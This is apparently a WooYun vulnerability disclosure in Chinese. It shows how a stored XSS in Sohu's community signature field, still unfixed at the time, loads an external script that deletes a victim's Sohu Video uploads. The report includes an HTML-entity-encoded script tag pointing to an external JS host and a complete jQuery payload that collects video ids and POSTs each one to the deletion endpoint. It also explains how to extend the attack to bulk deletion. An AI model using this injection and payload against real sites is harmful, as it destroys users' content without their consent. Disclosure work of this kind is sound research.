WooYun.org

1.上次搜狐的邮箱的域已经修改成mail.sohu.com
2.但是搜狐视频的域还是sohu.com,如图

3.其他内容看这个漏洞，然后我从例子开始说

 WooYun: 利用搜狐邮箱XSS劫持用户邮件 

4.可以从搜狐社区，获取搜狐视频的内容，如图

---------------------------------------------------------------------------------------
5.上次说的搜狐社区XSS还没有修复,还是能用，能加载外部JS(不要在意状态404，为了演示插入一个没有的页面演示,这样就没危害了)
6.签名档插入代码

<br>&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#32;&#115;&#114;&#99;&#61;&#34;http://q601333824.sinaapp.com/xss1.js&#34;

------------------------------------------------------------------------------------------
7.具体利用方法就是，获取用户视频列表的视频id,然后post请求删除,这个页面可以显示出用户一页视频

http://my.tv.sohu.com/user/video/list.do

8.这一段是我自己写的的JS代码，这个代码只删除一页视频,先获取当前页面所有视频id,然后把视频ID交给post函数循环删除.

var obj=$(".item.cfix");
var changdu=obj.length;
    if(changdu!=0){
	 function post(id){
		 alert(id);
		 $.post("http://my.tv.sohu.com/user/a/wvideo/deletevideos.do",
		 {"vids":id
		 },
		 function(data,stat){
			  if(stat=="success"){
				  alert("删除成功");
			    }else{	
				  alert("删除失败");
				}
			}
			 
	    );
    }
	for(var i=0;i<changdu;i++){
		var id=obj[i].getAttribute("data-vid");		
		post(id);
	}
}else{
	alert("对不起，您没有上传视频");
}

9.至于批量删除，可以实现的，因为一页显示10个视频，计算出总页数，也就是删除次数

删除次数=Math.ceil(总视频数量 / 10)

---------------------------------------------------------------------------------------------
10.下面直接测试图片(这次不要加载w3c菜鸟教程的库了，因为搜狐视频支持post)

①.我把每次获取的视频编号弹出来一次，这是其中一个视频

②.删除成功

③.那么多的post请求，返回删除成功

④.视频列表全没了(这我自己的号，不是别的，别打我)